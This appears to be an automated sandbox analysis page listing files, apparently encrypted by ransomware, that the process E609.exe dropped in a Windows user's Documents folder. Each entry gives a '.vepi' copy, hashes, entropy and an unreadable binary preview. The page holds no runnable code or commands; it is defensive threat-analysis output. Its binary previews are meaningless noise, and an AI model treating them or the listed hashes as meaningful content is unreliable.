..-....U.<.f..MU(.#..pR...$.....2..'-.....\|l...7...Mw..x.d/;..-vg\|5K1....M?......G...Z....I.gO..Y.C..Z.?.E........"..U%.E`.#...ll.RL.....y#...mZ...W.}.h..N.V...z.Y...$..e7Mp..9@.ah.....4.y.....]yc....5h."T~Fx.<4..f...{.'$.LQ.PQ.Lar......j:,.@`.c(.h..$%.....Mn...i....~......!e...p..k........1r._...s.W....yd..\|../.K.T.l[.4...6....']....8..;U....1...:..G.k}.....5.g......K_.r......1..U..P......W......7][d.s2,L2....h.j..........V_.g...R1a...YgT..q...w.....g".`.F.......J..K...GP..).+u...8...pu...Y5....D...z......]\|.Pe.7........Z.:..2.]1..5.M.....4..\|5......:` Z..oi.5..XXt../...h..y._B@..F...u......n.......%..r..g.3.?.xH.w.....I5gO..7<?...^...$..1..E)..N..q.E]....,&......q.........Au.{.".Ij5p....2...u.....5_t.....Lg..[..3..I..#.....].q..kE.\ s.........'..d..9<

C:\Users\user\Documents\AIXACVYBSB\UMMBDNEQBN.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863862206736299
Encrypted:	false
SSDEEP:	24:QZ8lhT7LWe/kYCho27jW4eXOBP1/QYZtrpuJ3EZECgkgonoDvjI6sbD:QZsPqOGho2VJS8rp+3EZEG1noDvcFD
MD5:	90EFC02547558ECA265C35E72BE9CBD8
SHA1:	7CC2FF4447CE2C6682D8582F954341A462667EC0
SHA-256:	FE3FDC94643A7B3890A2E329DF14393414A9F20740A252250EE734C9068895B5
SHA-512:	44E8CCDE8220BA0B81EDB7D0EDF09E895641AFB33DFBD1698372561170F2543946C9332206E28CE7F1C1974ADACC03D26B9DD2728C66AB89B7E077B8520DD4FB
Malicious:	false
Preview:	UMMBDhe....x.0 ...l6A.....i%.d...8..e0;.Z...xR.I.K.......q :.........Z..V5.B.........5.@.<v0.E.A..fcDh(.8X...yR]...C:P..a.. ...MS..-!8.EQ...PS...``.V..<F........)..<....A..2L.7>............M. ..,X0.\|....r.....%.g^A.^..E........>..ge&".hHj..3..}....!..P(..Q..q~.U..{.:...B.+...b.m\....gL-./.\..3W_.H..p..\.'.S....ya.n...:@.z....J..d..'....u..I.w..,...0!..g;f.]..FQ..[..6.R.F..../..((>H...$7....;...F..4..~..hyz.SwT..A~.T..rz..t.'..&Q"....9..Iy.......N.d...6....M .H......H..j...$6.8.X.G...b... .A....i....r.0.A.-..0....V(._k..Z...n1.{.....62..d2...6t.......4<2u.....#......E..}.{..G....J..5..%...uM...ff.0E\|:..f^k.a..4.. ..\|...\|.....lb..x.#.[(. ........!.fM...Z....W...i....?...Eh\|.......(.....=w.o....GA.%.\............_F..P.{$;mWyF.'},.Nx.d.Kw.E.........r....v.,?..\a....w2^.d...c.v......=..~.-#)..!..^.{.~.b..8..q..D....p.wDBE".nw....o.m......y.\|.J.....)...z...V..>.S#.tU.........(}.>..(o.6......\...t.IE...H.h...rd.."...D.l.L]....J.c.f}

C:\Users\user\Documents\AIXACVYBSB\UMMBDNEQBN.mp3.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863862206736299
Encrypted:	false
SSDEEP:	24:QZ8lhT7LWe/kYCho27jW4eXOBP1/QYZtrpuJ3EZECgkgonoDvjI6sbD:QZsPqOGho2VJS8rp+3EZEG1noDvcFD
MD5:	90EFC02547558ECA265C35E72BE9CBD8
SHA1:	7CC2FF4447CE2C6682D8582F954341A462667EC0
SHA-256:	FE3FDC94643A7B3890A2E329DF14393414A9F20740A252250EE734C9068895B5
SHA-512:	44E8CCDE8220BA0B81EDB7D0EDF09E895641AFB33DFBD1698372561170F2543946C9332206E28CE7F1C1974ADACC03D26B9DD2728C66AB89B7E077B8520DD4FB
Malicious:	false
Preview:	UMMBDhe....x.0 ...l6A.....i%.d...8..e0;.Z...xR.I.K.......q :.........Z..V5.B.........5.@.<v0.E.A..fcDh(.8X...yR]...C:P..a.. ...MS..-!8.EQ...PS...``.V..<F........)..<....A..2L.7>............M. ..,X0.\|....r.....%.g^A.^..E........>..ge&".hHj..3..}....!..P(..Q..q~.U..{.:...B.+...b.m\....gL-./.\..3W_.H..p..\.'.S....ya.n...:@.z....J..d..'....u..I.w..,...0!..g;f.]..FQ..[..6.R.F..../..((>H...$7....;...F..4..~..hyz.SwT..A~.T..rz..t.'..&Q"....9..Iy.......N.d...6....M .H......H..j...$6.8.X.G...b... .A....i....r.0.A.-..0....V(._k..Z...n1.{.....62..d2...6t.......4<2u.....#......E..}.{..G....J..5..%...uM...ff.0E\|:..f^k.a..4.. ..\|...\|.....lb..x.#.[(. ........!.fM...Z....W...i....?...Eh\|.......(.....=w.o....GA.%.\............_F..P.{$;mWyF.'},.Nx.d.Kw.E.........r....v.,?..\a....w2^.d...c.v......=..~.-#)..!..^.{.~.b..8..q..D....p.wDBE".nw....o.m......y.\|.J.....)...z...V..>.S#.tU.........(}.>..(o.6......\...t.IE...H.h...rd.."...D.l.L]....J.c.f}

C:\Users\user\Documents\AIXACVYBSB\VLZDGUKUTZ.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840347143672052
Encrypted:	false
SSDEEP:	24:qQ/qu+L3qYTMylzM6q9ELXlEM6PnxHLClss+zIn2VCpK23bOvEmjRebD:qTRplzM6qWn6PxIn2V323bQEmtcD
MD5:	9C87FA700E11CE7DDAFD1D9C8195DA6A
SHA1:	961C327F85BD24250B60B3265763BF1CAF6B4691
SHA-256:	93D65908C258920D4C31A68441EA11C751C90E56CC2553724258AA1D45CD2928
SHA-512:	7B7B530784DD21CADED4A52523E54BC265B50D9CADD74B7F74EC461D67BBCDD69296713C8E6B68B0AF6C7244BAA3EF94EC95457D20B10A82F6D59399EB46E0A5
Malicious:	false
Preview:	VLZDG....by+..q..rg;....;.P1....=..K....;WU..Q.........8....>.'.....x.pH..v)O X!..gT=.. ..j)x.......\|....:.j.....m.>C...m......py...=c..OK6...u~m..A....F...Rs:D..(Z..$..b.h'W5.Is..f....>.9.#...Z^..U...nW/........0.\.b.>(!dNM..>..g>.m..\.....p?...o.Ov....\a9..?<.Ab..V}..J(...0.w.....3N.B.....!..e[$:.i....G..n..&...a#.gy..VeZ9..y'....7..+....._Q@..%."s.!_Z...!..>.....i.3._4.;..=.@.Y......1iv\|.....=.VI.....XT...$..."MX..pa.......`.q\.?.....MN~z..r.%...s..Y...n....V$.u...,C.[...`2Jx.!.......Q.&.g....o....,..{oz....>C..<...>s..d.......=t/.8.7}P...GSL`...e..Pm...'....0.3f..h....Z...hv..>..YYj.t.e\|..>..k.?.Y.sWH..a.?=....:f......}sP...C.{.cN..o....._..l.`.s.......n...&.....C.>i...l..Z..>.O........~....PX...3....4.t.k2..QC...pa..8W..LB.6...}\|`+....M...C....F.s}}.@Zn.......~.I..K.D.e........0....-9:..K.q.L.....v1....Q.@q.(..p4..j.......F.\|j.i#.8.L....1~..U[.r:~}#.......<...z..gL.ot.N_4.._?"?.P.. k.D..$.c\|RK..H.l..6.u.......h.....pZ.`.-g.....

C:\Users\user\Documents\AIXACVYBSB\VLZDGUKUTZ.png.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840347143672052
Encrypted:	false
SSDEEP:	24:qQ/qu+L3qYTMylzM6q9ELXlEM6PnxHLClss+zIn2VCpK23bOvEmjRebD:qTRplzM6qWn6PxIn2V323bQEmtcD
MD5:	9C87FA700E11CE7DDAFD1D9C8195DA6A
SHA1:	961C327F85BD24250B60B3265763BF1CAF6B4691
SHA-256:	93D65908C258920D4C31A68441EA11C751C90E56CC2553724258AA1D45CD2928
SHA-512:	7B7B530784DD21CADED4A52523E54BC265B50D9CADD74B7F74EC461D67BBCDD69296713C8E6B68B0AF6C7244BAA3EF94EC95457D20B10A82F6D59399EB46E0A5
Malicious:	false
Preview:	VLZDG....by+..q..rg;....;.P1....=..K....;WU..Q.........8....>.'.....x.pH..v)O X!..gT=.. ..j)x.......\|....:.j.....m.>C...m......py...=c..OK6...u~m..A....F...Rs:D..(Z..$..b.h'W5.Is..f....>.9.#...Z^..U...nW/........0.\.b.>(!dNM..>..g>.m..\.....p?...o.Ov....\a9..?<.Ab..V}..J(...0.w.....3N.B.....!..e[$:.i....G..n..&...a#.gy..VeZ9..y'....7..+....._Q@..%."s.!_Z...!..>.....i.3._4.;..=.@.Y......1iv\|.....=.VI.....XT...$..."MX..pa.......`.q\.?.....MN~z..r.%...s..Y...n....V$.u...,C.[...`2Jx.!.......Q.&.g....o....,..{oz....>C..<...>s..d.......=t/.8.7}P...GSL`...e..Pm...'....0.3f..h....Z...hv..>..YYj.t.e\|..>..k.?.Y.sWH..a.?=....:f......}sP...C.{.cN..o....._..l.`.s.......n...&.....C.>i...l..Z..>.O........~....PX...3....4.t.k2..QC...pa..8W..LB.6...}\|`+....M...C....F.s}}.@Zn.......~.I..K.D.e........0....-9:..K.q.L.....v1....Q.@q.(..p4..j.......F.\|j.i#.8.L....1~..U[.r:~}#.......<...z..gL.ot.N_4.._?"?.P.. k.D..$.c\|RK..H.l..6.u.......h.....pZ.`.-g.....

C:\Users\user\Documents\AIXACVYBSB\XZXHAVGRAG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832687776262569
Encrypted:	false
SSDEEP:	24:HLwIrxHdqgiYcxHS6c3V1OMbR39Z/2YBR1rK66X6amyPicbdtEcjiyIqN7yjqHbD:HLwIrZdmyp1XNZ/vL1rGX6ascBOKiAhP
MD5:	DDD8C18576B9209F945E74E808FCFD03
SHA1:	E648C73AB00BC488DC04A583BF75C0C758639082
SHA-256:	F671272D386282A5D5D322318E505FDA55CBF01AF548ACE2CF5F8F3F4D115A6E
SHA-512:	CCBC2B83CB58F8A4BFB2162564C3417BB3CB0588E839659308BB285C2120B24280DFDB5469EB4EEBCE9DB021B8046D3772FEC4F78DF7A38686C7846C3C8730B9
Malicious:	false
Preview:	XZXHA..8.n...1......Op..k..R...u...\|]&.Xs.M(s.).d).S......\|U`...x...!.!...8..........9............H.1.G.(.L?}c.e..`.k:........'..Ft..n...G.....\..x.... ...u.i.........d....!.z.}/t...G..a..i.).....O..e..u.>.@1......6@X..S..l..,..<z.<.j..IX.p9..,+.{..e.l..o.O.e.^.....;....[>G.$..)r.Jb.<%.....[.>..G..?......w.+..Y....X6..4l....x/w.7.vf.Qv}...o...mZv.j.........\....i_ng..g.)h.)Y..(.../....I6.I......%....j),..S...ZHr/J.......j.m..3.g..r.Bj....>l..M...].So.......n....9..=.......S....L..C.....Q.../..+?.7..F.d5.x..........X.E/.....0\..o..X=A...w.;....5......O.y.c.....^X&...]7p.(.B..y.Mi..o.z=nk.D......1..7Q{5#_W;$JO!-G.i.4.B.......-m......L>......M...w.n........`.v ..BM{./.z.gi.v.......1....rJ....J..'O.7$..-C.1.B(...a.sH."......(....dH.g.U.WF..+._\|.......!.LK#A..Ky...\...U..J..(w..8....{0;.bQ.._........!a..9D3\|.$n...S.IV..P.'-.;.K4'`.........+-.it.pIyVz..j7......2S..)M.....f.....&..,...3.......1....u..........)Y.Hr...5"._....P.../.i9..m

C:\Users\user\Documents\AIXACVYBSB\XZXHAVGRAG.pdf.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832687776262569
Encrypted:	false
SSDEEP:	24:HLwIrxHdqgiYcxHS6c3V1OMbR39Z/2YBR1rK66X6amyPicbdtEcjiyIqN7yjqHbD:HLwIrZdmyp1XNZ/vL1rGX6ascBOKiAhP
MD5:	DDD8C18576B9209F945E74E808FCFD03
SHA1:	E648C73AB00BC488DC04A583BF75C0C758639082
SHA-256:	F671272D386282A5D5D322318E505FDA55CBF01AF548ACE2CF5F8F3F4D115A6E
SHA-512:	CCBC2B83CB58F8A4BFB2162564C3417BB3CB0588E839659308BB285C2120B24280DFDB5469EB4EEBCE9DB021B8046D3772FEC4F78DF7A38686C7846C3C8730B9
Malicious:	false
Preview:	XZXHA..8.n...1......Op..k..R...u...\|]&.Xs.M(s.).d).S......\|U`...x...!.!...8..........9............H.1.G.(.L?}c.e..`.k:........'..Ft..n...G.....\..x.... ...u.i.........d....!.z.}/t...G..a..i.).....O..e..u.>.@1......6@X..S..l..,..<z.<.j..IX.p9..,+.{..e.l..o.O.e.^.....;....[>G.$..)r.Jb.<%.....[.>..G..?......w.+..Y....X6..4l....x/w.7.vf.Qv}...o...mZv.j.........\....i_ng..g.)h.)Y..(.../....I6.I......%....j),..S...ZHr/J.......j.m..3.g..r.Bj....>l..M...].So.......n....9..=.......S....L..C.....Q.../..+?.7..F.d5.x..........X.E/.....0\..o..X=A...w.;....5......O.y.c.....^X&...]7p.(.B..y.Mi..o.z=nk.D......1..7Q{5#_W;$JO!-G.i.4.B.......-m......L>......M...w.n........`.v ..BM{./.z.gi.v.......1....rJ....J..'O.7$..-C.1.B(...a.sH."......(....dH.g.U.WF..+._\|.......!.LK#A..Ky...\...U..J..(w..8....{0;.bQ.._........!a..9D3\|.$n...S.IV..P.'-.;.K4'`.........+-.it.pIyVz..j7......2S..)M.....f.....&..,...3.......1....u..........)Y.Hr...5"._....P.../.i9..m

C:\Users\user\Documents\BPMLNOBVSB.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8386303303188924
Encrypted:	false
SSDEEP:	24:8Ew+4owRZc83zuUqWxbfje/OG2tq0/Yxe1dxWxZyQVJJZa6IfEMmEWVTZRjbD:8Ew+4de83sWxntsaTd8x0QV3Za6l+g3z
MD5:	9BFB78E51BA9E0CF2C6DF04A1E114201
SHA1:	CBFD240E7C56E2F7D6B884AD1A0D3E5193A75ABA
SHA-256:	79B1EF0380DDB7219FF4B015E9067A7EADFF5BB59A37172CEE15F6A3E3A231A4
SHA-512:	509B6C8A0CFC51BD81638A67FC6546C48C5E6E0820167093911E467A72E04DAC226E0D4758596CD0DA20CC4533AC010E3DEB01BF41994303FE6644F697FE379D
Malicious:	false
Preview:	BPMLNp>.IRM..) ._m.....1.?.B.......!}./.9...C.5/..!..3.W?nP.[y.........'\|,VU...c....jn"M...t...N.I..f..\|w.w.o+.f.{....p....q...E.P...6#..GWS.D.=..`kO.....R.......T-.).._..,w_\..N.o..S.....q.....t..}D.).=........Z.y.t.Z....?.Z.....=z#......y..af..w.K$..u.....{0.............T.k..S"..0..BP..L.(9lb.+..w..i..$..<.GNU6.YxM..c.L..........$.......-......U..m......l..]...........6..\|z{R.?.C.OEF.X...8;o. -%#.......X?..U.\|......Z2...(n...}.x.....nmC..\..I<.ES.....06.....i.."WGW.\...z..v....=.z.......1.Ji@...hb.3..I.F.A...h.G.s%5...$.C.-.!.p._J.=.`.}....H&Lg..A..!....Hv..<.^.w?.3...-..?-.#i{"A_..Ezr_.f.%.wz.....{"..@es.P:{.....P....DdF...g..@.}.b.}...Z......r.p8`.........V.nw'Y......>..C.IJ5_.....B.w.......`..s;.".y...aC'.=.vyO......d.x...@\|.!.....Q....},.Q>.?.l.k%^..cA<Z.....l.2..d.%).`H 7.....M)J.E...G.{. .?.....V...4.........Q;K(.f.....%.0.....x..ok.yge. ...6.P.\k..<9...rI.c..9Ey.*.......:.>r.hK?-.^........d.......jTe......K4X.=...q.;..s..

C:\Users\user\Documents\BPMLNOBVSB.mp3.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8386303303188924
Encrypted:	false
SSDEEP:	24:8Ew+4owRZc83zuUqWxbfje/OG2tq0/Yxe1dxWxZyQVJJZa6IfEMmEWVTZRjbD:8Ew+4de83sWxntsaTd8x0QV3Za6l+g3z
MD5:	9BFB78E51BA9E0CF2C6DF04A1E114201
SHA1:	CBFD240E7C56E2F7D6B884AD1A0D3E5193A75ABA
SHA-256:	79B1EF0380DDB7219FF4B015E9067A7EADFF5BB59A37172CEE15F6A3E3A231A4
SHA-512:	509B6C8A0CFC51BD81638A67FC6546C48C5E6E0820167093911E467A72E04DAC226E0D4758596CD0DA20CC4533AC010E3DEB01BF41994303FE6644F697FE379D
Malicious:	false
Preview:	BPMLNp>.IRM..) ._m.....1.?.B.......!}./.9...C.5/..!..3.W?nP.[y.........'\|,VU...c....jn"M...t...N.I..f..\|w.w.o+.f.{....p....q...E.P...6#..GWS.D.=..`kO.....R.......T-.).._..,w_\..N.o..S.....q.....t..}D.).=........Z.y.t.Z....?.Z.....=z#......y..af..w.K$..u.....{0.............T.k..S"..0..BP..L.(9lb.+..w..i..$..<.GNU6.YxM..c.L..........$.......-......U..m......l..]...........6..\|z{R.?.C.OEF.X...8;o. -%#.......X?..U.\|......Z2...(n...}.x.....nmC..\..I<.ES.....06.....i.."WGW.\...z..v....=.z.......1.Ji@...hb.3..I.F.A...h.G.s%5...$.C.-.!.p._J.=.`.}....H&Lg..A..!....Hv..<.^.w?.3...-..?-.#i{"A_..Ezr_.f.%.wz.....{"..@es.P:{.....P....DdF...g..@.}.b.}...Z......r.p8`.........V.nw'Y......>..C.IJ5_.....B.w.......`..s;.".y...aC'.=.vyO......d.x...@\|.!.....Q....},.Q>.?.l.k%^..cA<Z.....l.2..d.%).`H 7.....M)J.E...G.{. .?.....V...4.........Q;K(.f.....%.0.....x..ok.yge. ...6.P.\k..<9...rI.c..9Ey.*.......:.>r.hK?-.^........d.......jTe......K4X.=...q.;..s..

C:\Users\user\Documents\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8615785539061225
Encrypted:	false
SSDEEP:	24:470qE0pcrbvi0HVTtdKn/tuYTiSNA/MZROa7FIRQ9SP3M9/asUbIy9fBbD:O0qEhTk/tuYKMTL53skkXD
MD5:	98F8A5CAA56A1E0A23B051DC3B197173
SHA1:	F00B0F902FEE5F7FE85FC583EFD4BCCCDC2B27CD
SHA-256:	9CBA32E9AAAED9A7E81072E43BADF8E58A3F5185E262126267CEB8F06E0D59F5
SHA-512:	A6FF79C2075B8E5AF0F2D3936C7C8AD559459480007EF22686287395EB17D5EACE2D0F6A6AAC2B455F70A2DC4DF002A3B4722CBECAF17E4F1A15E305A50ABA18
Malicious:	false
Preview:	DTBZG5.-..I....XON.(....Z)@..p.2W....P..3..........g.Z...#...e.S...~\&.na.<.......\|...X0rfu[].2HZ.S... \[z..r#.._.D.!/..PH...I.C.... ?..+..z...m.$M.....^..8..........:.;...."..BN.0..@...hgtif.....-u...+.S.....AG.e..1....C....j8a..Rx.3A.6.s.......n.........+Cu..X.........c..s..qu.F.zC~u.....g ....2.^+l.....`.a~.......l.L.1)L7.7.........~[u....}...........M..Y..H.s...b.[.rI..MW...j.....p.o.........A..;Y......O..QE......O4....w.....Tl1.....A...........c{.7.pp$.n....E....}.<..l.64.5..._.i...~.,../2.pw.1./..R.i.8u{.@u^zZ4...L...\|.....d....o.E.}.s?..L.%.v..=.......t...k..Qg....<e...B..(3.B:.>V.....\.......{.O...g..<..`...d......aj...,.........$..=Z..}...[.J;,.8...(...Q.R.".u!.<"..^$.......{B.....X#....4.:M&.?.._R."3..U.i/:....1$..R.F..9t..{~..sBZ2..A..N.....E.u.....$.<.T.......R.e..a.B...XQ......KK`...........W...S7<F.m.....2g....f..9{..-uk..Cz.j[\|.%.-B......8,...=d.=...4X.l...E.\.L.O..\.cOt.`..RR...4\..G.&..C..`..T.K.>07...Y.\|.=

C:\Users\user\Documents\DTBZGIOOSO.docx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8615785539061225
Encrypted:	false
SSDEEP:	24:470qE0pcrbvi0HVTtdKn/tuYTiSNA/MZROa7FIRQ9SP3M9/asUbIy9fBbD:O0qEhTk/tuYKMTL53skkXD
MD5:	98F8A5CAA56A1E0A23B051DC3B197173
SHA1:	F00B0F902FEE5F7FE85FC583EFD4BCCCDC2B27CD
SHA-256:	9CBA32E9AAAED9A7E81072E43BADF8E58A3F5185E262126267CEB8F06E0D59F5
SHA-512:	A6FF79C2075B8E5AF0F2D3936C7C8AD559459480007EF22686287395EB17D5EACE2D0F6A6AAC2B455F70A2DC4DF002A3B4722CBECAF17E4F1A15E305A50ABA18
Malicious:	false
Preview:	DTBZG5.-..I....XON.(....Z)@..p.2W....P..3..........g.Z...#...e.S...~\&.na.<.......\|...X0rfu[].2HZ.S... \[z..r#.._.D.!/..PH...I.C.... ?..+..z...m.$M.....^..8..........:.;...."..BN.0..@...hgtif.....-u...+.S.....AG.e..1....C....j8a..Rx.3A.6.s.......n.........+Cu..X.........c..s..qu.F.zC~u.....g ....2.^+l.....`.a~.......l.L.1)L7.7.........~[u....}...........M..Y..H.s...b.[.rI..MW...j.....p.o.........A..;Y......O..QE......O4....w.....Tl1.....A...........c{.7.pp$.n....E....}.<..l.64.5..._.i...~.,../2.pw.1./..R.i.8u{.@u^zZ4...L...\|.....d....o.E.}.s?..L.%.v..=.......t...k..Qg....<e...B..(3.B:.>V.....\.......{.O...g..<..`...d......aj...,.........$..=Z..}...[.J;,.8...(...Q.R.".u!.<"..^$.......{B.....X#....4.:M&.?.._R."3..U.i/:....1$..R.F..9t..{~..sBZ2..A..N.....E.u.....$.<.T.......R.e..a.B...XQ......KK`...........W...S7<F.m.....2g....f..9{..-uk..Cz.j[\|.%.-B......8,...=d.=...4X.l...E.\.L.O..\.cOt.`..RR...4\..G.&..C..`..T.K.>07...Y.\|.=

C:\Users\user\Documents\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869855209702247
Encrypted:	false
SSDEEP:	24:Pq6mY8OagzsPeZXBBFq7Y4+UU8o4hLDhSRmRnUDAW/QBbyVsjbD:ijPO36oDE0l4dSRwiEbyy3D
MD5:	8282B62F7DEC1699B21353086CEAEF04
SHA1:	3DFB7591B43B279C810FF54E17D4AF7A744ACA8F
SHA-256:	24E94B1FC8BD459FA4447F5F6B27DB4D613EEB2B2E9632DD5FA62C0CBF915A97
SHA-512:	E225678DC86D076425F05C1C6D6C33BB0833CFC8AD0F974D2968EB4D7861713B33F7B1DBD9D9AAA4B39C299DB74F5B3BC6693DA3E0788FA236C81061EDC320D1
Malicious:	false
Preview:	DTBZGe[...Bx.:Q..2?A!$P.z......s...}...Y`..Yy... .tL.d...6.....=+=u.H..pAi+...4a....s...~z....v.U..[..1.....P....S..Z..+t.P.t.(I..4.)....%.(I4....e...o...J$.....(..+q/.g.......b}....I...Y{W...xC#..Se.s[...3.0!.....0..m.i/%[....kQv;yp@....Vf&... pW.<.&...&.\yV....S...g+....#...v.. ~u..d..A:.Bg...u.2wP....J.9=..V..I\........zv.....n.K.5V..c..G...3..'%.U...5.v..d...c.Q..Mu..a.b....5.l......>.F}:;j..............x.C....D'{H..."F........x..-%..4........1H..m.@v..&.P..}.Q...?..M..s'.@. 4.....?.~.gJ ..........r]..i....?q.r`Y.^...).G..T.......=N2.lq6(y.5r.Ge........>..+-..\..M.U.'..H.a..y..&RO.....p..../^+.._D...#.u.+.0...s..?..hI.%..yX..r......"..S(sl<...g....V..5cC..%..4..vM....i..mr....64...nf..<.......TVE.e/!....x.......R.%g..0M...`ec~....XM...ZK.._:.......)...qc..#.N"-3.Q.y...}D..9q..L"..<.....5{_.N...WH.....J..!...........C.....@3.........wr\|{d......'\|...3.+y.^q1-I.a."...7..imtM{.....m.>..N.O.i......A.[.....&....5D]T..S..m......y..ww.C

C:\Users\user\Documents\DTBZGIOOSO.xlsx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869855209702247
Encrypted:	false
SSDEEP:	24:Pq6mY8OagzsPeZXBBFq7Y4+UU8o4hLDhSRmRnUDAW/QBbyVsjbD:ijPO36oDE0l4dSRwiEbyy3D
MD5:	8282B62F7DEC1699B21353086CEAEF04
SHA1:	3DFB7591B43B279C810FF54E17D4AF7A744ACA8F
SHA-256:	24E94B1FC8BD459FA4447F5F6B27DB4D613EEB2B2E9632DD5FA62C0CBF915A97
SHA-512:	E225678DC86D076425F05C1C6D6C33BB0833CFC8AD0F974D2968EB4D7861713B33F7B1DBD9D9AAA4B39C299DB74F5B3BC6693DA3E0788FA236C81061EDC320D1
Malicious:	false
Preview:	DTBZGe[...Bx.:Q..2?A!$P.z......s...}...Y`..Yy... .tL.d...6.....=+=u.H..pAi+...4a....s...~z....v.U..[..1.....P....S..Z..+t.P.t.(I..4.)....%.(I4....e...o...J$.....(..+q/.g.......b}....I...Y{W...xC#..Se.s[...3.0!.....0..m.i/%[....kQv;yp@....Vf&... pW.<.&...&.\yV....S...g+....#...v.. ~u..d..A:.Bg...u.2wP....J.9=..V..I\........zv.....n.K.5V..c..G...3..'%.U...5.v..d...c.Q..Mu..a.b....5.l......>.F}:;j..............x.C....D'{H..."F........x..-%..4........1H..m.@v..&.P..}.Q...?..M..s'.@. 4.....?.~.gJ ..........r]..i....?q.r`Y.^...).G..T.......=N2.lq6(y.5r.Ge........>..+-..\..M.U.'..H.a..y..&RO.....p..../^+.._D...#.u.+.0...s..?..hI.%..yX..r......"..S(sl<...g....V..5cC..%..4..vM....i..mr....64...nf..<.......TVE.e/!....x.......R.%g..0M...`ec~....XM...ZK.._:.......)...qc..#.N"-3.Q.y...}D..9q..L"..<.....5{_.N...WH.....J..!...........C.....@3.........wr\|{d......'\|...3.+y.^q1-I.a."...7..imtM{.....m.>..N.O.i......A.[.....&....5D]T..S..m......y..ww.C

C:\Users\user\Documents\DTBZGIOOSO\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839321514963968
Encrypted:	false
SSDEEP:	24:aJLgCoRW/N+2tv4on28W2pDY29NTOdZuDtt5Rr+rbD:WtvCpENTO4r5RCPD
MD5:	CBDFFC3100C094813888B1516C91E5E0
SHA1:	4AE077DF7DBE0F607BA7BB73B50AD80F56CC63C0
SHA-256:	4ECC5279D3036DF243432BD53E995BC000C846A0B27345BEBDFD929BD0D83125
SHA-512:	E2F706F20AEDABB79772D8AD4D1A1055461CE9AD7D72A743E4192D81EF7ECB16BA2D4BDE016159276AFEFDE145CC98EE205B220EF878EF6BF366E2162CE48B19
Malicious:	false
Preview:	DTBZG....C1..U)<.m15....U...un.bou..z...t.5K....ddX...S.....=7.Rs...eoT.\|...8..d..a\|1........f.b.....".q\|}.Y6.c.0.e9...3Bhna.W........./0X.E.....b..5..?.........X?...#.v...FW..J.r..j./.....%.."..... ;#..S..oq.w[...6.....)..d.l ..d".D.,..R}A/BJ.....30D#.wF.4.q..]..&...to...L....k0.L..ub....%2..u....0...m`....I11....7.(.&.E/4..._ ..9....}I.4p.JK\|GL....!a.`....{.....D........o.h.~..3..gze.ZFG..zww....{`....s..!.}..{[A.75O.]..)&.u(H...1no.Q........:.........}.....)...,...T..P.T....f..o...q.GR.#/]..0.....F..=.0%)R>.:......M@2.7q.m...[.3.....5....Q~.....Dz.~C.$.?c.0}...O.....v..jH.s...a353....x.='..i....a.x.....>.*]......8JZK.I..Ed/,....bg(-8.B>p"...P..:X..`'0....,...H4pmO.L..;.J.G..r. .....ZW.e..\!....[...7......w....!.....$X..!0..>....u..(...f.i....C.....A+......j.hiZR.e4..7T.E...N.GX..6............x.._...4.H..6..qr.u=.u.A.'s......3Z>Tt.\|.p.....o.&...3.:{.(....-..72.s[6..NF.._<...]..{.A?....j..8..Y5.)4..F.....[.sw.]..?.S,.8...C.ZW<...\-x...

C:\Users\user\Documents\DTBZGIOOSO\DTBZGIOOSO.docx.vepi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\E609.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839321514963968
Encrypted:	false
SSDEEP:	24:aJLgCoRW/N+2tv4on28W2pDY29NTOdZuDtt5Rr+rbD:WtvCpENTO4r5RCPD
MD5:	CBDFFC3100C094813888B1516C91E5E0
SHA1:	4AE077DF7DBE0F607BA7BB73B50AD80F56CC63C0
SHA-256:	4ECC5279D3036DF243432BD53E995BC000C846A0B27345BEBDFD929BD0D83125
SHA-512:	E2F706F20AEDABB79772D8AD4D1A1055461CE9AD7D72A743E4192D81EF7ECB16BA2D4BDE016159276AFEFDE145CC98EE205B220EF878EF6BF366E2162CE48B19
Malicious:	false
